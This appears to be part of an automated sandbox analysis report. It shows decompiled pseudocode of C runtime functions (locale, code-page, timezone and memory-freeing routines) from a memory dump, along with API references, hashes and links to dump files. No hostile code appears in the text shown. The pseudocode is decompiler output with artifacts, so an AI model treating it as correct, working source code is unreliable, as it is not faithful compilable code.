Function 6E21DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E21DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E20D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E21DD27(" )#nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E21D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E21D775();
					} else {
						E6E21D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E21DD27("t!#nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E21D775();
							} else {
								E6E21D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E21DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e20e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E21D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E202188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e28506c; // 0x9881d723
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E20D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E20D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E21E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E21806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E21E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E1DF8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E214323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6E214323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E227BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E214323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E227BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E225124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E20E042,?,?,?,?,6E20DA1E,?,00000004), ref: 6E21DE78
_wcschr.LIBVCRUNTIME ref: 6E21DF08
_wcschr.LIBVCRUNTIME ref: 6E21DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B n,00000000,?), ref: 6E21DFB9

Strings

)#nU, xrefs: 6E21DDD4
t!#nE, xrefs: 6E21DE09
B n, xrefs: 6E21DE8F, 6E21DED7, 6E21DF7F

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )#nU$B n$t!#nE
API String ID: 4212172061-4144220597
Opcode ID: 6757db110dfd2b23916a57cf028d6f9966738da2931647a5005137c17de45bbd
Instruction ID: bbbab55976af9d5c1a7ffe5aa649fe409673dd482c809d4b8049263cb240cde8
Opcode Fuzzy Hash: 6757db110dfd2b23916a57cf028d6f9966738da2931647a5005137c17de45bbd
Instruction Fuzzy Hash: 8661D47650824FEBEB149BB5CC45BE773EEEF05706F100869EA199B180EB70E7418B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E21E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e21e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e232f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e232f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E20BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e21e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E21E837,?,00000000), ref: 6E21E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E21E837,?,00000000), ref: 6E21E5DA
GetACP.KERNEL32(?,?,6E21E837,?,00000000), ref: 6E21E5EF

Strings

7!n, xrefs: 6E21E5CF, 6E21E5A6
OCP, xrefs: 6E21E56C
ACP, xrefs: 6E21E536

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: 7!n$ACP$OCP
API String ID: 2299586839-4196688072
Opcode ID: 454be04db5065429e1aec12d0171cd7070d5a62cee135b8deba0232cdc0be799
Instruction ID: 8a2673a683c2d79cb7e5ebb185317e206550357095f6e925e7dbae220fd6e587
Opcode Fuzzy Hash: 454be04db5065429e1aec12d0171cd7070d5a62cee135b8deba0232cdc0be799
Instruction Fuzzy Hash: 33219F6261810EBBE7548FD9CD05BC777F7AB45B25B568414EA0AC7904F722DB40C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2850b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E20CBD3(_t46);
							E6E21C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E20CBD3(_t47);
							E6E21CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E20CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E20CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E21C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2852b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E20CBD3(_t31);
							E6E20CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E20CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E20CBD3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6E21BFA8

Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C7EC
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C7FE
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C810
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C822
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C834
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C846
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C858
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C86A
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C87C
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C88E
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8A0
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8B2
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8C4

_free.LIBCMT ref: 6E21BF9D

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21BFBF
_free.LIBCMT ref: 6E21BFD4
_free.LIBCMT ref: 6E21BFDF
_free.LIBCMT ref: 6E21C001
_free.LIBCMT ref: 6E21C014
_free.LIBCMT ref: 6E21C022
_free.LIBCMT ref: 6E21C02D
_free.LIBCMT ref: 6E21C065
_free.LIBCMT ref: 6E21C06C
_free.LIBCMT ref: 6E21C089
_free.LIBCMT ref: 6E21C0A1

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: abec6757cb203f6266636243d5c73318f77cccac9ef3466e4328dddb970f46af
Instruction ID: e17b0c478c9c3151b25e56ba352149982991586cd884885720d8e47ced67a47b
Opcode Fuzzy Hash: abec6757cb203f6266636243d5c73318f77cccac9ef3466e4328dddb970f46af
Instruction Fuzzy Hash: 8231607550830E9FE7549AB4D842BDB73FBAF00B15F204829E159DB2A5EF71AA408B21

Uniqueness

Uniqueness Score: -1.00%

Function 6E21877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E21877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E21822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E218289( &_v8) != 0 || E6E218231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E21822B();
					_t32 =  &_v52; // 0x6e232130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E218289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E202188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e28506c; // 0x9881d723
						_v100 = _t74 ^ _t192;
						 *0x6e285384 =  *0x6e285384 | 0xffffffff;
						 *0x6e285378 =  *0x6e285378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e287a10 = 0;
						_t78 = E6E211216(0x6e232130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e232130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E20F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E211216(0x6e232130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e232130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E20CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E20CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E21877C(0x6e232130, _t172, __eflags);
							}
						}
						E6E20CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E1DF8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E218231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E21825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E20CBD3( *0x6e287a08);
								 *0x6e287a08 = 0;
								 *_t194 = 0x6e287a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e287a18 * 0x3c;
									_t168 =  *0x6e287a6c; // 0x0
									_push(_t171);
									 *0x6e287a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e287a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e287ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e287ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E203CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e287a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e287a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E218225()) = _v12;
								 *((intOrPtr*)(E6E218219())) = _v16;
								_t96 = E6E21821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e287a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E20CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e218b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e218b6e
						 *0x6e287a08 = E6E20F26D(_t154 - _t170, _t13);
						_t116 = E6E20CBD3(0);
						_t167 =  *0x6e287a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e218b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e218b6e
							_t119 = E6E20AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E223B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E20BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E20BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E20BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E218225()) = _v8;
										_t128 = E6E218219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E223B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

APIs

_free.LIBCMT ref: 6E2187FE
_free.LIBCMT ref: 6E218822
_free.LIBCMT ref: 6E2189A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60
_free.LIBCMT ref: 6E218B75

Strings

0!#n, xrefs: 6E218AD8
0!#n, xrefs: 6E218964, 6E21896A

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!#n$0!#n
API String ID: 314583886-3624508691
Opcode ID: 12627bd429004748b48d57a478fdc163d295cd05ff7410d13bda5d43afee6539
Instruction ID: 23a6e4e1c5b83169292d934ed07ee66a08b09556963554a62719022d91549310
Opcode Fuzzy Hash: 12627bd429004748b48d57a478fdc163d295cd05ff7410d13bda5d43afee6539
Instruction Fuzzy Hash: 70C12875A0824EAFDB098FE8C8D4AEA7BFFAF46314F14455AD691D7280E7308B41C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E20D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e230c10) {
					E6E20CBD3(_t52);
					_t26 = _a4;
				}
				E6E20CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E20D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E20D28E(4,  &_v8);
			}

APIs

